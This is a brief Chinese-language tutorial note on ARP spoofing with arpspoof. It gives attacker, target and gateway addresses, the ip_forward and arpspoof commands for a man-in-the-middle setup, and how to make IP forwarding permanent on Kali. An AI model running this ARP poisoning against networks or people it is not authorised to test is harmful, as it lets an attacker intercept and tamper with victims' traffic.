arpspoof流量转发

---

攻击者网卡:eth0
攻击者ip: 192.168.1.2
目标ip: 192.168.1.3
网关ip: 192.168.1.1

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1

注：

echo 1 > /proc/sys/net/ipv4/ip_forward

• 这条命令功能是ip转发，每次使用之前都需要执行，每次重启终端其内容会自动变为0，也就是说临时开启ip转发。 .
• 如果需要永久开启ip转发需要修改/etc/sysctl.conf文件，修改下面一行的值：

  net.ipv4.ip_forward = 1
  

  kali2016.1 默认在28行
  修改后执行下面的命令来使修改生效：

  sysctl -p /etc/sysctl.conf
  

  或重启电脑后生效。
  进行了上面的配置后，IP转发功能就永久使能了。

• Linux系统缺省并没有打开IP转发功能，要确认IP转发功能的状态，可以查看/proc文件系统，使用下面命令：

  cat /proc/sys/net/ipv4/ip_forward
  

如果上述文件中的值为0,说明禁止进行IP转发；如果是1,则说明IP转发功能已经打开。